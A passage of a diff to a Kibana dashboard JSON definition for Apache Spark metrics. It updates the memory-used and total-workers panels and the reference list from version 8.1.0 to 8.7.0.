"8.7.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0", + "w": 13, + "x": 13, + "y": 36 + }, + "panelIndex": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-7a60dd89-db58-4e7e-b73a-139574b69402", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a871806a-160b-4da4-bcd5-700175899a73", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "55f22446-ec98-430e-b92e-0660335ab2d9", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "7a60dd89-db58-4e7e-b73a-139574b69402": { + "columnOrder": [ + "2001af6a-ebf0-4acc-afe2-d58db49ee160" + ], + "columns": { + "2001af6a-ebf0-4acc-afe2-d58db49ee160": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Memory Used (MB)", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.node.worker.memory.used" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "a871806a-160b-4da4-bcd5-700175899a73", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.node" }, - "enhancements": {}, - "hidePanelTitles": true, - "vis": null - }, - "gridData": { - "h": 9, - "i": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0", - "w": 13, - "x": 13, - "y": 36 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.node" + } + } }, - "panelIndex": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0", - "title": "Memory Used [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "55f22446-ec98-430e-b92e-0660335ab2d9", + "key": "apache_spark.node.worker.memory.used", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.node.worker.memory.used" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "2001af6a-ebf0-4acc-afe2-d58db49ee160", + "layerId": "7a60dd89-db58-4e7e-b73a-139574b69402", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-340a830f-a169-4a46-959d-6471aac521f9", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1723d45d-1e3e-422c-921d-06a9ad1d3309", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "59410b0e-e834-4387-b6a8-dd1e252c87c9", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "340a830f-a169-4a46-959d-6471aac521f9": { - "columnOrder": [ - "fa33204d-6b0a-45ee-8a54-480191ba2782" - ], - "columns": { - "fa33204d-6b0a-45ee-8a54-480191ba2782": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total Workers", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.node.main.workers.count" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "1723d45d-1e3e-422c-921d-06a9ad1d3309", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.node" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.node" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "59410b0e-e834-4387-b6a8-dd1e252c87c9", - "key": "apache_spark.node.main.workers.count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.node.main.workers.count" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "fa33204d-6b0a-45ee-8a54-480191ba2782", - "layerId": "340a830f-a169-4a46-959d-6471aac521f9", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "vis": null, + "type": "lens" + }, + "title": "Memory Used [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d", + "w": 8, + "x": 26, + "y": 39 + }, + "panelIndex": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-340a830f-a169-4a46-959d-6471aac521f9", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1723d45d-1e3e-422c-921d-06a9ad1d3309", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "59410b0e-e834-4387-b6a8-dd1e252c87c9", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "340a830f-a169-4a46-959d-6471aac521f9": { + "columnOrder": [ + "fa33204d-6b0a-45ee-8a54-480191ba2782" + ], + "columns": { + "fa33204d-6b0a-45ee-8a54-480191ba2782": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Workers", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.node.main.workers.count" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "1723d45d-1e3e-422c-921d-06a9ad1d3309", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.node" }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 6, - "i": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d", - "w": 8, - "x": 26, - "y": 39 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.node" + } + } }, - "panelIndex": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d", - "title": "Total Workers [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" - } - ], - "timeRestore": false, - "title": "[Metrics Apache Spark] Overview", - "version": 1 - }, - "coreMigrationVersion": "8.1.0", - "id": "apache_spark-b22dc960-a06c-11ec-8d4f-4fe3367a4156", - "migrationVersion": { - "dashboard": "8.1.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "a3339a86-6f2b-4f1a-85b8-4619c417a110:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a3339a86-6f2b-4f1a-85b8-4619c417a110:indexpattern-datasource-layer-d7cd2d50-503d-48cc-b9d1-77da873349ef", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a3339a86-6f2b-4f1a-85b8-4619c417a110:9857a495-b7e6-4893-93e6-f16c050e0e41", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a3339a86-6f2b-4f1a-85b8-4619c417a110:d59683b7-5f29-46b9-b01b-20b6aea422fe", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2943002d-504e-4a30-a581-cd92fd621fe1:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2943002d-504e-4a30-a581-cd92fd621fe1:indexpattern-datasource-layer-37e4c96b-3ba5-4033-9727-fad41089931d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2943002d-504e-4a30-a581-cd92fd621fe1:8198873e-cf0a-43cf-8cd0-cd42a8df02c5", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2943002d-504e-4a30-a581-cd92fd621fe1:5df2fe94-f51b-44f9-b922-75663cb6996a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "784e4a18-20e7-48ef-8737-3a8a4643c4fe:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "784e4a18-20e7-48ef-8737-3a8a4643c4fe:indexpattern-datasource-layer-bb1faa77-fef6-486c-aaf9-ec1411bdad13", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "784e4a18-20e7-48ef-8737-3a8a4643c4fe:603b47e3-4608-4094-8826-f923eab506a8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "784e4a18-20e7-48ef-8737-3a8a4643c4fe:4a09ba27-dc93-43cf-be91-0632bc81cb47", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f:indexpattern-datasource-layer-6fc27bd4-9bc3-4233-9b1d-61df80582ad8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f:7e8d1def-772c-494c-b14e-eae96e52b074", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f:c5b629cf-0836-49ff-a409-23cb47735f02", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f84a1cd9-1b4b-484e-87f7-953c2f645570:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f84a1cd9-1b4b-484e-87f7-953c2f645570:indexpattern-datasource-layer-df39527d-9339-47cb-9833-2e3d3ccc9c30", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f84a1cd9-1b4b-484e-87f7-953c2f645570:787550e5-b4cd-4892-babc-4f3d33c078ec", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "64cbf207-795a-4818-915c-137eaebc6198:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "64cbf207-795a-4818-915c-137eaebc6198:indexpattern-datasource-layer-efa9fcdd-f421-4c27-a85b-3a6d2512a09d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "64cbf207-795a-4818-915c-137eaebc6198:b8679379-0bbe-4028-b3e7-2cc0f84fa045", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "64cbf207-795a-4818-915c-137eaebc6198:97467acb-706a-4078-ae1a-ac6ab5fd47d7", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "62c6f93e-b6c1-4004-b780-535ed730ebaa:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "62c6f93e-b6c1-4004-b780-535ed730ebaa:indexpattern-datasource-layer-483b85ff-1b76-41d9-926b-25f70122ef28", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "62c6f93e-b6c1-4004-b780-535ed730ebaa:509e9888-4307-45b6-9c04-5b7feafeef87", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "62c6f93e-b6c1-4004-b780-535ed730ebaa:df5be9fa-fb96-4da2-a042-71b37b7c3275", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa:indexpattern-datasource-layer-aec1fa6a-6818-41f0-862a-8c7feed2ea3e", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa:3fe0b162-ec79-4815-895a-79ac382ca1d7", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa:62857a2d-669f-4c70-9f92-dcab405c9f9a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "b5caa5d1-221e-400d-a11a-ea539f1f4546:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "b5caa5d1-221e-400d-a11a-ea539f1f4546:indexpattern-datasource-layer-df39527d-9339-47cb-9833-2e3d3ccc9c30", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "b5caa5d1-221e-400d-a11a-ea539f1f4546:1215080a-2795-41e4-a618-d54b0e020cbc", - "type": "index-pattern" - }, - { - "id": "apache_spark-114428e0-c165-11ec-97dc-abb2b7efe8a8", - "name": "7a729bca-db45-4ffe-b1bf-51fdc30e3b18:panel_7a729bca-db45-4ffe-b1bf-51fdc30e3b18", - "type": "lens" - }, - { - "id": "apache_spark-478726a0-c165-11ec-97dc-abb2b7efe8a8", - "name": "0595e44f-e6b0-4d93-868f-040f2eb0de31:panel_0595e44f-e6b0-4d93-868f-040f2eb0de31", - "type": "lens" - }, - { - "id": "metrics-*", - "name": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2:indexpattern-datasource-layer-d4698267-4169-47b1-81cd-17bd8621879f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2:171181c8-0b9a-4664-85cb-0e8b82132b7a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2:6ffc819a-ab7a-43bd-aa18-dbd327428425", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "75c23769-a2bd-4825-b20a-d140aeb36175:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "75c23769-a2bd-4825-b20a-d140aeb36175:indexpattern-datasource-layer-aa4bc89a-1467-4370-980f-99b6e33890d7", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "75c23769-a2bd-4825-b20a-d140aeb36175:975bff6a-acfa-481f-86ba-7d697e207f65", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "75c23769-a2bd-4825-b20a-d140aeb36175:b889078f-52b4-4fdd-8fd5-6a636ff903a6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ab9316b5-5728-4b03-aadb-a93e22da9257:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ab9316b5-5728-4b03-aadb-a93e22da9257:indexpattern-datasource-layer-de0d9a21-100f-4912-a985-ca42e4347241", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ab9316b5-5728-4b03-aadb-a93e22da9257:cffd3ad8-723b-4694-bf3e-9d8a826ce05e", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ab9316b5-5728-4b03-aadb-a93e22da9257:a3034e1f-cb79-4ef6-91f1-ff8b1f2510c8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad:indexpattern-datasource-layer-6eefe8fe-74a8-4b9d-a786-7d9dc8ca26e6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad:6fdd6b46-a1d0-470b-bf9a-527dc0444653", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad:948085ee-3b01-4c26-8bb4-b3c40b02049d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "cfbdf185-1437-478f-a856-eedbe62d1de2:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "cfbdf185-1437-478f-a856-eedbe62d1de2:indexpattern-datasource-layer-530fc85b-0ba7-4f65-862b-a303af533c19", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "cfbdf185-1437-478f-a856-eedbe62d1de2:e76b86a5-b6ba-4537-a0d1-046096a9807d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "cfbdf185-1437-478f-a856-eedbe62d1de2:d950973c-f5b8-4aae-857a-e8eccbecd2d6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "78e81e12-c659-4d89-a80d-14ec4e49368a:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "78e81e12-c659-4d89-a80d-14ec4e49368a:indexpattern-datasource-layer-148ce684-6f54-430c-9b71-69989419abd4", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "78e81e12-c659-4d89-a80d-14ec4e49368a:c7bd1bca-ca54-4168-8ed5-2e45bd906d13", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843:indexpattern-datasource-layer-87763c10-0d2a-4ff0-afb1-4d261c6c52de", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843:7c76ed08-e31a-4d5a-a8a3-d6f7763d3c40", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843:fffcc31c-dfa7-4d03-baf5-d0c48357153f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0:indexpattern-datasource-layer-7a60dd89-db58-4e7e-b73a-139574b69402", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0:a871806a-160b-4da4-bcd5-700175899a73", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0:55f22446-ec98-430e-b92e-0660335ab2d9", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d:indexpattern-datasource-layer-340a830f-a169-4a46-959d-6471aac521f9", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d:1723d45d-1e3e-422c-921d-06a9ad1d3309", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d:59410b0e-e834-4387-b6a8-dd1e252c87c9", - "type": "index-pattern" - } + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "59410b0e-e834-4387-b6a8-dd1e252c87c9", + "key": "apache_spark.node.main.workers.count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.node.main.workers.count" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "fa33204d-6b0a-45ee-8a54-480191ba2782", + "layerId": "340a830f-a169-4a46-959d-6471aac521f9", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Total Workers [Metrics Apache Spark]" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics Apache Spark] Overview", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "a3339a86-6f2b-4f1a-85b8-4619c417a110:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a3339a86-6f2b-4f1a-85b8-4619c417a110:indexpattern-datasource-layer-d7cd2d50-503d-48cc-b9d1-77da873349ef", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a3339a86-6f2b-4f1a-85b8-4619c417a110:9857a495-b7e6-4893-93e6-f16c050e0e41", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a3339a86-6f2b-4f1a-85b8-4619c417a110:d59683b7-5f29-46b9-b01b-20b6aea422fe", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2943002d-504e-4a30-a581-cd92fd621fe1:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2943002d-504e-4a30-a581-cd92fd621fe1:indexpattern-datasource-layer-37e4c96b-3ba5-4033-9727-fad41089931d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2943002d-504e-4a30-a581-cd92fd621fe1:8198873e-cf0a-43cf-8cd0-cd42a8df02c5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2943002d-504e-4a30-a581-cd92fd621fe1:5df2fe94-f51b-44f9-b922-75663cb6996a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "784e4a18-20e7-48ef-8737-3a8a4643c4fe:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "784e4a18-20e7-48ef-8737-3a8a4643c4fe:indexpattern-datasource-layer-bb1faa77-fef6-486c-aaf9-ec1411bdad13", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "784e4a18-20e7-48ef-8737-3a8a4643c4fe:603b47e3-4608-4094-8826-f923eab506a8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "784e4a18-20e7-48ef-8737-3a8a4643c4fe:4a09ba27-dc93-43cf-be91-0632bc81cb47", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f:indexpattern-datasource-layer-6fc27bd4-9bc3-4233-9b1d-61df80582ad8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f:7e8d1def-772c-494c-b14e-eae96e52b074", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f:c5b629cf-0836-49ff-a409-23cb47735f02", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f84a1cd9-1b4b-484e-87f7-953c2f645570:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f84a1cd9-1b4b-484e-87f7-953c2f645570:indexpattern-datasource-layer-df39527d-9339-47cb-9833-2e3d3ccc9c30", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f84a1cd9-1b4b-484e-87f7-953c2f645570:787550e5-b4cd-4892-babc-4f3d33c078ec", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "64cbf207-795a-4818-915c-137eaebc6198:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "64cbf207-795a-4818-915c-137eaebc6198:indexpattern-datasource-layer-efa9fcdd-f421-4c27-a85b-3a6d2512a09d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "64cbf207-795a-4818-915c-137eaebc6198:b8679379-0bbe-4028-b3e7-2cc0f84fa045", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "64cbf207-795a-4818-915c-137eaebc6198:97467acb-706a-4078-ae1a-ac6ab5fd47d7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "62c6f93e-b6c1-4004-b780-535ed730ebaa:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "62c6f93e-b6c1-4004-b780-535ed730ebaa:indexpattern-datasource-layer-483b85ff-1b76-41d9-926b-25f70122ef28", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "62c6f93e-b6c1-4004-b780-535ed730ebaa:509e9888-4307-45b6-9c04-5b7feafeef87", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "62c6f93e-b6c1-4004-b780-535ed730ebaa:df5be9fa-fb96-4da2-a042-71b37b7c3275", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa:indexpattern-datasource-layer-aec1fa6a-6818-41f0-862a-8c7feed2ea3e", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa:3fe0b162-ec79-4815-895a-79ac382ca1d7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa:62857a2d-669f-4c70-9f92-dcab405c9f9a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b5caa5d1-221e-400d-a11a-ea539f1f4546:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b5caa5d1-221e-400d-a11a-ea539f1f4546:indexpattern-datasource-layer-df39527d-9339-47cb-9833-2e3d3ccc9c30", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b5caa5d1-221e-400d-a11a-ea539f1f4546:1215080a-2795-41e4-a618-d54b0e020cbc", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2:indexpattern-datasource-layer-d4698267-4169-47b1-81cd-17bd8621879f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2:171181c8-0b9a-4664-85cb-0e8b82132b7a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2:6ffc819a-ab7a-43bd-aa18-dbd327428425", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "75c23769-a2bd-4825-b20a-d140aeb36175:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "75c23769-a2bd-4825-b20a-d140aeb36175:indexpattern-datasource-layer-aa4bc89a-1467-4370-980f-99b6e33890d7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "75c23769-a2bd-4825-b20a-d140aeb36175:975bff6a-acfa-481f-86ba-7d697e207f65", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "75c23769-a2bd-4825-b20a-d140aeb36175:b889078f-52b4-4fdd-8fd5-6a636ff903a6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ab9316b5-5728-4b03-aadb-a93e22da9257:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ab9316b5-5728-4b03-aadb-a93e22da9257:indexpattern-datasource-layer-de0d9a21-100f-4912-a985-ca42e4347241", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ab9316b5-5728-4b03-aadb-a93e22da9257:cffd3ad8-723b-4694-bf3e-9d8a826ce05e", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ab9316b5-5728-4b03-aadb-a93e22da9257:a3034e1f-cb79-4ef6-91f1-ff8b1f2510c8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad:indexpattern-datasource-layer-6eefe8fe-74a8-4b9d-a786-7d9dc8ca26e6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad:6fdd6b46-a1d0-470b-bf9a-527dc0444653", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad:948085ee-3b01-4c26-8bb4-b3c40b02049d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "cfbdf185-1437-478f-a856-eedbe62d1de2:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "cfbdf185-1437-478f-a856-eedbe62d1de2:indexpattern-datasource-layer-530fc85b-0ba7-4f65-862b-a303af533c19", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "cfbdf185-1437-478f-a856-eedbe62d1de2:e76b86a5-b6ba-4537-a0d1-046096a9807d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "cfbdf185-1437-478f-a856-eedbe62d1de2:d950973c-f5b8-4aae-857a-e8eccbecd2d6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 